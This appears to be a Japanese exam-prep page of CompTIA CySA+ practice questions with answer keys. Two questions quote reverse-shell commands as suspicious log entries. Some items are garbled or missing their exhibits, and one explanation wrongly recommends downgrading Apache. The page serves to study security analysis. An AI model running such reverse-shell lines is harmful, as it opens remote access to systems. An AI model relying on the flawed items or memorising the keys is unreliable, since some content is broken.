CS0-003試験無料問題集（328題）「CompTIA Cybersecurity Analyst (CySA+) Certification 認定」

出題：1

An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network. Which of the following should the CSIRT conduct next?

A. Research the malware strain to perform attribution

B. Restore the affected server to remove any malware

C. Take a snapshot of the compromised server and verify its integrity

D. Contact the appropriate government agency to investigate

正解：C 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：2

Given the following CVSS string-
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/3:U/C:K/I:K/A:H
Which of the following attributes correctly describes this vulnerability?

A. The vulnerability does not affect confidentiality.

B. The complexity to exploit the vulnerability is high.

C. A user is required to exploit this vulnerability.

D. The vulnerability is network based.

正解：D 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：3

Which of the following best describes the goal of a disaster recovery exercise as preparation for possible incidents?

A. To verify the roles of the incident response team

B. To provide recommendations for handling vulnerabilities

C. To perform tests against implemented security controls

D. TO provide metrics and test continuity controls

正解：D 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：4

While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the following steps should be taken next?

A. Shut the network down immediately and call the next person in the chain of command.

B. Determine what attack the odd characters are indicative of

C. Notify the local law enforcement for incident response

D. Utilize the correct attack framework and determine what the incident response will consist of.

正解：B 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：5

A security analyst needs to mitigate a known, exploited vulnerability related not tack vector that embeds software through the USB interface. Which of the following should the analyst do first?

A. Check configurations to determine whether USB ports are enabled on company assets.

B. Conduct security awareness training on the risks of using unknown and unencrypted USBs.

C. Review logs to see whether this exploitable vulnerability has already impacted the company.

D. Write a removable media policy that explains that USBs cannot be connected to a company asset.

正解：A 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：6

You are a cybersecurity analyst tasked with interpreting scan data from Company As servers You must verify the requirements are being met for all of the servers and recommend changes if you find they are not The company's hardening guidelines indicate the following
* TLS 1 2 is the only version of TLS
running.
* Apache 2.4.18 or greater should be used.
* Only default ports should be used.
INSTRUCTIONS
using the supplied dat
a. record the status of compliance With the company's guidelines for each server.
The question contains two parts: make sure you complete Part 1 and Part 2. Make recommendations for Issues based ONLY on the hardening guidelines provided.
Part 1:

AppServ2:

AppServ3:

AppServ4:

Part 2:

正解：

check the explanation part below for the solution
Explanation:
Part 1:

Part 2:
Based on the compliance report, I recommend the following changes for each server:
AppServ1: No changes are needed for this server.
AppServ2: Disable or upgrade TLS 1.0 and TLS 1.1 to TLS 1.2 on this server to ensure secure encryption and communication between clients and the server. Update Apache from version 2.4.17 to version 2.4.18 or greater on this server to fix any potential vulnerabilities or bugs.
AppServ3: Downgrade Apache from version 2.4.19 to version 2.4.18 or lower on this server to ensure compatibility and stability with the company's applications and policies. Change the port number from 8080 to either port 80 (for HTTP) or port 443 (for HTTPS) on this server to follow the default port convention and avoid any confusion or conflicts with other services.
AppServ4: Update Apache from version 2.4.16 to version 2.4.18 or greater on this server to fix any potential vulnerabilities or bugs. Change the port number from 8443 to either port 80 (for HTTP) or port 443 (for HTTPS) on this server to follow the default port convention and avoid any confusion or conflicts with other services.

出題：7

A security analyst identified the following suspicious entry on the host-based IDS logs:
bash -i >& /dev/tcp/10.1.2.3/8080 0>&1
Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?

A. #!/bin/bash
nc 10.1.2.3 8080 -vv >dev/null && echo "Malicious activity" Il echo "OK"

B. #!/bin/bash
ls /opt/tcp/10.1.2.3/8080 >dev/null && echo "Malicious activity" I| echo "OK"

C. #!/bin/bash
ps -fea | grep 8080 >dev/null && echo "Malicious activity" I| echo "OK"

D. #!/bin/bash
netstat -antp Igrep 8080 >dev/null && echo "Malicious activity" I| echo "OK"

正解：D 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：8

An analyst is designing a message system for a bank. The analyst wants to include a feature that allows the recipient of a message to prove to a third party that the message came from the sender Which of the following information security goals is the analyst most likely trying to achieve?

A. Authorization

B. Integrity

C. Non-repudiation

D. Authentication

正解：C 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：9

After identifying a threat, a company has decided to implement a patch management program to remediate vulnerabilities. Which of the following risk management principles is the company exercising?

A. Mitigate

B. Transfer

C. Avoid

D. Accept

正解：A 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：10

A security analyst is reviewing the findings of the latest vulnerability report for a company's web application. The web application accepts files for a Bash script to be processed if the files match a given hash. The analyst is able to submit files to the system due to a hash collision. Which of the following should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and infrastructure?

A. Replace the current MD5 with SHA-256.

B. Deploy a WAF to the front of the application.

C. Deploy an antivirus application on the hosting system.

D. Replace the MD5 with digital signatures.

正解：A 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：11

A security analyst is reviewing the following alert that was triggered by FIM on a critical system:

Which of the following best describes the suspicious activity that is occurring?

A. A fake antivirus program was installed by the user.

B. A network drive was added to allow exfiltration of data

C. A new program has been set to execute on system start

D. The host firewall on 192.168.1.10 was disabled.

正解：C 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：12

A security analyst detects an exploit attempt containing the following command:
sh -i >& /dev/udp/10.1.1.1/4821 0>$l
Which of the following is being attempted?

A. SQL injection

B. XSS

C. Reverse shell

D. RCE

正解：C 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：13

Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrence?

A. Vulnerability assessment

B. Compliance report

C. Penetration test

D. Risk register

正解：D 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：14

An analyst is reviewing a vulnerability report for a server environment with the following entries:

Which of the following systems should be prioritized for patching first?

A. 54.74.110.228

B. 10.101.27.98

C. 54.74.110.26

D. 54.73.225.17

正解：A 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：15

A web application team notifies a SOC analyst that there are thousands of HTTP/404 events on the public-facing web server. Which of the following is the next step for the analyst to take?

A. Instruct the firewall engineer that a rule needs to be added to block this external server.

B. Notify the incident response team that a DDoS attack is occurring.

C. Identify the IP/hostname for the requests and look at the related activity.

D. Escalate the event to an incident and notify the SOC manager of the activity.

正解：C 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

出題：16

An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP address across the entire network automatically. Which of the following is the best option to help the analyst implement this recommendation?

A. SLA

B. SIEM

C. IoC

D. SOAR

正解：D 解答を投票する

解説: (GoShiken メンバーにのみ表示されます)

CS0-003試験無料問題集「CompTIA Cybersecurity Analyst (CySA+) Certification 認定」